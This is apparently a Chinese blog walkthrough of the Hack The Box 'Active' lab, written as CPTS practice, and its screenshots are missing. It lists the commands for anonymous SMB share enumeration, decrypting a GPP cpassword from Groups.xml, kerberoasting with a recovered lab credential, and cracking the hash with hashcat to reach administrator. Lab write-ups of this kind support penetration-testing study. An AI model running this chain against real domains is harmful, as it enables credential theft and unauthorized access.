当前位置: 首页 > news >正文

CPTS---Active 复现

枚举和利用

nmap -sC -sV -T4 -Pn -n -p- 10.10.10.100

在这里插入图片描述

nmap -Pn -n 10.10.10.100 -sU --top-ports=100 --reason

在这里插入图片描述

与DC核对调整一下时间
rdate -n 10.10.10.100
在这里插入图片描述
匿名枚举smb共享

nxc smb 10.10.10.100 -u '' -p '' --spider Replication --regex . --smb-timeout 10000

在这里插入图片描述
发现Replication可读,列出全部目录,方便查看共享文件
在这里插入图片描述
发现Groups.xml,尝试下载到本地
在这里插入图片描述
查看
在这里插入图片描述
发现一个cpassword的属性很有兴趣,尝试google,可以使用这个工具
在这里插入图片描述
得到密码
在这里插入图片描述
尝试kerberoasting攻击

nxc ldap 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --kerberoasting kerberoasting.out

在这里插入图片描述
得到管理员hash

hashcat -m 13100 hash rockyou.txt

在这里插入图片描述
得到密码。

提权

利用管理员凭证登陆
在这里插入图片描述
成功

http://www.dtcms.com/a/337118.html

相关文章:

  • Python netifaces 库详解:跨平台网络接口与 IP 地址管理
  • Alma Linux 8 中解决掉 Failed to set locale, defaulting to C.UTF-8
  • vue3入门-v-model、ref和reactive讲解
  • Flink Stream API - 源码开发需求描述
  • Apache IoTDB集群部署实战:1C2D架构的高性能时序数据库搭建与优化指南
  • Claude Code 代理商汇总:2025年最新评测
  • 【Vivado TCL教程】从零开始掌握Xilinx Vivado TCL脚本编程(一)
  • 【Jenkins】03 - 自动构建和docker构建
  • 在 CentOS 7 上使用 LAMP 架构部署 WordPress
  • 制作全流程对比:侗家灰水粽VS布依族草灰粽的8道工序差异
  • 大厂 | 华为半导体业务部2026届秋招启动
  • scikit-learn/sklearn学习|弹性网络ElasticNet解读
  • 机器学习-决策树:从原理到实战的机器学习入门指南
  • 大模型的底层运算线性代数
  • 实现自学习系统,输入excel文件,能学习后进行相应回答
  • 香港服务器是否支持RAID磁盘阵列?
  • RTSP 播放器 vs RTMP 播放器:延迟对比与技术实践
  • HAProxy使用方法以及和LVS区别
  • 【数据库】Navicat 导入 Excel 数据乱码问题的解决方法
  • NY291NY297美光固态闪存NY298NY303
  • Jina Embeddings:高性能多模态向量模型的演进之路
  • Minitab AI 加持的头脑风暴法,破解企业改进难题
  • 驱动开发系列64 - glCompileShader实现之 GLSL normalize 精度优化
  • Linux 中断机制深度分析
  • SpatialLLM,SpatialReasoner,SpatialLM论文解读
  • 云原生事件驱动引擎(RocketMQ-EventBridge)应用场景与技术解析
  • 01数据结构-交换排序
  • 【EI会议征稿通知】第五届高性能计算、大数据与通信工程国际学术会议(ICHBC 2025)
  • 蓝桥杯算法之搜索章 - 6
  • LeetCode热题100--226. 翻转二叉树--简单